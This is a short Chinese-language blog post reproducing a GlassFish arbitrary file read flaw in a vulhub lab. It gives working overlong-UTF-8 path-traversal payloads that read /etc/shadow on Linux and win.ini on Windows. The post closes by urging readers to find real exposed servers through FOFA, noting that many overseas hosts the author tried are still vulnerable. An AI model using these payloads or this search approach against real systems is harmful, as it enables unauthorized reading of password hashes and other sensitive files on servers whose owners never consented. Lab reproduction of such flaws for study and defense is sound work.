/* 粒子吸附*/

Glassfish 任意文件读取漏洞

1.Glassfish 简介

GlassFish 是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。

2.漏洞类型

任意文件读取漏洞,可以利用此漏洞读取受害者的任意文件

3.漏洞复现

3.1我们还是使用 vulhub 漏洞环境

点击查看代码
docker-compose build    
docker-compose up -d
docker-compose ps 

使用上诉命令启动环境,并查看目标端口,并用浏览器访问

3.2因为docker 环境在 linux 所以使用 使用linux 系统命令读取文件附linux和windows 系统 payload

点击查看代码
linux_poc:
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow
window_poc:
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

其中 可以通过这个漏洞读取 /etc/shadow 下的敏感文件

windows 环境下类似,可以通过 fofa 搜索符合条件的地址,可以通过windows 系统环境 payload 进行验证,这里不再赘述,读者可以根据自己的情况,在最后写入自己想读取的文件所在路径。

可以使用 fofa 批量搜索

我发现国内一个都没有。。。全是国外的,试了试发现还是有许多都存在漏洞的,感兴趣的可以试一下。

posted @ 2023-04-12 15:06  sergenry  阅读(281)  评论(0)    收藏  举报